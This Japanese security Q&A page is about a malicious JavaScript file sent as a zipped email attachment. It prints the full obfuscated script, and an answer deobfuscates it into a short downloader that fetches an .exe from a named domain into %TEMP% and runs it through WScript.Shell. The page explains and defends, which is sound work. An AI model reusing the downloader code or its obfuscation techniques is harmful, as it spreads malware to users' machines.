web-dev-qa-db-ja.com

このjavascript攻撃はどのように機能しますか?

StackOverflowで同様のコードの抜粋でクローズド質問 がありますが、プログラミング関連の質問ではないためクローズされているため、代わりにここで質問すると思いました。

これはZipファイルでメールで送信されましたが、メモ帳++で開くとJSファイルを読み取ることができ、(おそらく?)実行できません。 https://www.hybrid-analysis.com にリンクするコードのサブセットを検索すると、 Googleにはたくさんの結果 があり、RansomWareであることを示します。しかし、このコードが実際に行うことを説明することは可能ですか?

一見ランダムな単語のシーケンスは、マルウェアの既知のシグネチャと同様にコードが検出されるのを回避するために存在しているようであり、文字列が操作されてコードが形成され、実行されますか?

iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.Push( elem ); } } return matched; };";
fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = [("dingle","adornment","n")+"hh"+("precipitous","astounding","peruse","devon","lH")+"CNAl", "A"+"iR"+"Nh"+("dover","ambiguous","diocese","cD")+"nBHy", "E"+"xpan"+("disable","foamy","titled","mandate","dEnviron")+"me"+"nt"+"Stri"+("river","polyphonic","ngs"), ("flower","centered","gently","petiole","")+"%"+("spirituality","unabashed","TE")+"MP%", ""+("interaction","career","perception",".")+"exe", ("wives","electrical","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("regarded","crossroads","vi")+("botanist","expense","explains","manatarms","nc")+"enti"+"ve"+"eXincentiv"+("excruciating","futures","concepts","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("vaccination","metres","twill","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("writing","tiffany","S"), "AmvHaUzPHrP", ("humdrum","cavernous","suave","beryl","h")+"in"+"ce"+("vespers","bountiful","gripe","nt")+"iv"+"ee"+("terrier","echoing","education","li")+"nc"+("tranny","basilica","en")+"ti"+("cooperate","festive","modem","gains","vel"), "UJcMlBfkOA", "G"+("centers","aqueduct","plugins","rRAF")+"Ka"+("creased","storing","twine","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("enthusiast","pounce","iniquitous","Xi")+"nc"+"en"+("optical","migration","disks","marche","ti")+"ve"+("describe","impaired","israeli","ML")+"in"+"ce"+("sorts","fabled","nt")+("usurped","federal","iv")+"e2" + "."+"in"+"ce"+("decoy","lobby","brazilian","supervisors","nt")+("rancorous","pierce","terror","iv")+"eXMi"+"ncenti"+("stretcher","depict","sheer","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT";
societies = (("notoriety", "linguist", "HiLPFi", "ventures", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
theoriess = (("inalienable", "cognizance", "ziHwqRxJu", "dozen", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.Push( n ); } ";
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];";
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
KcjXPEtu = "} return matched; };";
revealede = (("underlying", "scrip", "eYyeHhl", "angular", "EbYlGrsShJg") + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); ";
zBqJutIT["o" + societies + revealede + "n"](("aviation","unreliable","nutrition","published","G") + revealede + ("mouth","consensus","agents","pricing","T"), poseidon, false);

QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];";
zBqJutIT[theoriess + ("republicans","aggrandizement","e") + (("educated", "hybrid", "vQJtIpP", "enact", "torpor", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("lingo", "caitiff", "CEdBvsmD", "dealtime", "vbulletin", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
wGSsSnAuJ = " if ( not ) { expr = \":not(\" + expr + \")\"; ";
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+("slang","biology","A")+"pO"+("intimate","dramatist","easterly","encouraging","DB.") + ""+"S"+("sheila","premises","fatherless","tr")+"eam").replace("p", "D"));
    PbOLTH.open();
    RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/\1>|)$/ );";
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;";
    PbOLTH[("sonnet","heath","dried","mains","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("capsule","begin","enlargement","heracles","pon") + theoriess + "e"+"Bo"+("laconically","discovery","dy")]);
    eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );";
    PbOLTH[(societies + "o"+"Di"+("unpopular","anarchist","remix","tying","ti")+"on").replace("D", theoriess)] = 0;
    rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );";
    PbOLTH["sav"+"eT"+"oF"+("silhouette","participate","eligible","employed","ile")](jersey, 2);
    JzDFHcYwRvt = "} if ( typeof qualifier === \"string\" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); ";
    PbOLTH.close();
    ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); ";
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== \"string\" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); ";
}

} catch (HiQurqnDJ) { };

hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;";
}
undeveloped(("craven","surgical","motels","h")+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+("grandchildren","probabilities","nudity","normal","ka")+"rta.co"+"m/"+"sy"+"stem"+("dorset","portal","advertise","substantial","/l")+("mango","thrush","productive","ogs/98")+("flush","cyclone","h7")+("johnson","studying","b66gb.")+"exe","yROdkAds");
NrQwRjPqXlj = "} return elems.length === 1 && elem.nodeType === 1 ? jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] : jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { return elem.nodeType === 1; } ) ); };";
7
JLo

未使用の文字列がたくさんあり、一部はコンマ演算子の左側にあり、一部は使用されない変数に割り当てられています(jqueryコードフラグメントのように見えます。jqueryは実際にはここでは使用されません)。

それらを削除すると、あなたは残っています

_fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = ["n"+"hh"+"lH"+"CNAl", "A"+"iR"+"Nh"+"cD"+"nBHy", "E"+"xpan"+"dEnviron"+"me"+"nt"+"Stri"+"ngs", ""+"%"+"TE"+"MP%", ""+"."+"exe", "R"+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+"vi"+"nc"+"enti"+"ve"+"eXincentiv"+"eObinc"+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", "W"+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + "S", "AmvHaUzPHrP", "h"+"in"+"ce"+"nt"+"iv"+"ee"+"li"+"nc"+"en"+"ti"+"vel", "UJcMlBfkOA", "G"+"rRAF"+"Ka"+"je"+"To", "Min"+"ce"+"ntiv"+"eS"+"Xi"+"nc"+"en"+"ti"+"ve"+"ML"+"in"+"ce"+"nt"+"iv"+"e2" + "."+"in"+"ce"+"nt"+"iv"+"eXMi"+"ncenti"+"ve"+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = ("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction();
theoriess = ("sSBVEfa" + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = ("EbYlGrsShJg" + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "e" + ("nxldkIa" + "GyucrQNudzq").contradistinction() + ("dMNcSDdMEzF" + "wKxDlSnr").contradistinction()]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK((""+"A"+"pO"+"DB." + ""+"S"+"tr"+"eam").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["w"+"ri"+"te"](zBqJutIT[""+"R"+"es"+"pon" + theoriess + "e"+"Bo"+"dy"]);
    PbOLTH[(societies + "o"+"Di"+"ti"+"on").replace("D", theoriess)] = 0;
    PbOLTH["sav"+"eT"+"oF"+"ile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("h"+"tt"+"p://"+"soft"+"le"+"ns"+"ja"+"ka"+"rta.co"+"m/"+"sy"+"stem"+"/l"+"ogs/98"+"h7"+"b66gb."+"exe","yROdkAds");
_

これで、クリーンアップするための非常に単純な文字列連結がたくさんあります。また、Stringオブジェクトに対して定義するcontradistinctionメソッドは、文字列の最初の文字を返すだけです。したがって、たとえば、_("pVrSBHnCPxP" + "kbmKKwklAVc").contradistinction()_は単に_"p"_を意味します。それらを解決すると、次のようになります。

_fergusI = 0;
var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActincentiveivincentiveeXincentiveObincentivejeincentivect", "sFtalU", "FlAYMT", "WScincentiveriptincentive.S", "AmvHaUzPHrP", "hincentiveelincentivel", "UJcMlBfkOA", "GrRAFKajeTo", "MincentiveSXincentiveMLincentive2.incentiveXMincentiveLHincentiveTTP"];
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
societies = "p";
theoriess = "s";

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
revealede = "E";

function undeveloped(poseidon, economic) {
    try {
    var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
zBqJutIT["o" + societies + revealede + "n"]("G" + revealede + "T", poseidon, false);

zBqJutIT[theoriess + "end"]();
if (zBqJutIT.status == 200) {
    var PbOLTH = new lrAXrUK(("ApODB.Stream").replace("p", "D"));
    PbOLTH.open();
    PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
    PbOLTH["write"](zBqJutIT["Respon" + theoriess + "eBody"]);
    PbOLTH[(societies + "oDition").replace("D", theoriess)] = 0;
    PbOLTH["saveToFile"](jersey, 2);
    PbOLTH.close();
    OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU");
}

} catch (HiQurqnDJ) { };

}
undeveloped("http://softlensjakarta.com/system/logs/98h7b66gb.exe","yROdkAds");
_

現在、最終行にはっきりと表示されているURLが主要なポイントです。

すべての.split("incentive").join()呼び出しで、文字列incentiveは、使用される前にすべての長い文字列から削除されるおとりです。これをuUXTroの初期値まで実行すると、一部の文字列が認識可能になります。

_var uUXTro = ["nhhlHCNAl", "AiRNhcDnBHy", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "ActiveXObject", "sFtalU", "FlAYMT", "WScript.S", "AmvHaUzPHrP", "hell", "UJcMlBfkOA", "GrRAFKajeTo", "MSXML2.XMLHTTP"];
_

残りの手順は説明しませんが、何が起こるかを理解するのは非常に簡単です。 fergusIはさまざまな整数値を取り、uUXTro配列にインデックスを付け、さらにいくつかの文字列連結が発生し、いくつかのおとり文字列がuUXTroからスプライスされます(ただし、一部は残っています) 、そして最終的な結果は基本的にこれです:

_var Shell = new ActiveXObject("WScript.Shell");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
var exe = Shell.ExpandEnvironmentStrings("%TEMP%") + "/yROdkAds.exe";
xhr.open("GET", "http://softlensjakarta.com/system/logs/98h7b66gb.exe", false);
xhr.send();
if(xhr.status == 200) {
  var stream = new ActiveXObject("ADODB.Stream");
  stream.open();
  stream.type=1;
  stream.write(xhr.ResponseBody);
  stream.position = 0;
  stream.saveToFile(exe, 2);
  stream.close();
  Shell.Run(exe, 1, false);
}
_

ここで、私は4つの最も重要な変数を取り、それらに解読された名前を付けました。

_Shell was OoKse
xhr was zBqJutIT
exe was jersey
stream was PbOLTH
_

要約すると、このスクリプトはダウンローダーです。攻撃者が制御するサーバーからプログラムを取得して実行したい。 softlensjakartaのURLに直接アクセスしようとすると、_STUPID LOCKY_という文字を含む12バイトのファイルができます。それは、現在は修正されている侵害されたサーバーであったことを意味します(そして、「STUPID LOCKY」は誰かが許可を拒否したというメッセージの考えです)、または実際のサーバーが送信する前に脆弱なユーザーエージェントをチェックする非常に巧妙な悪意のあるサーバーである可能性があります。マルウェア。

悪意のあるダウンローダーを使用すると、ダウンローダーのコードを見ただけでは、ペイロードがどうなるかを実際に知ることはできません。他のマルウェアの作者があなたをだましてダウンローダーを実行させた人に支払う金額によって決定されるローテーションで、同じURLから提供される多くの異なる悪意のあるプログラムが存在する可能性があります。 ( ペイパーインストールマルウェア

14
user54862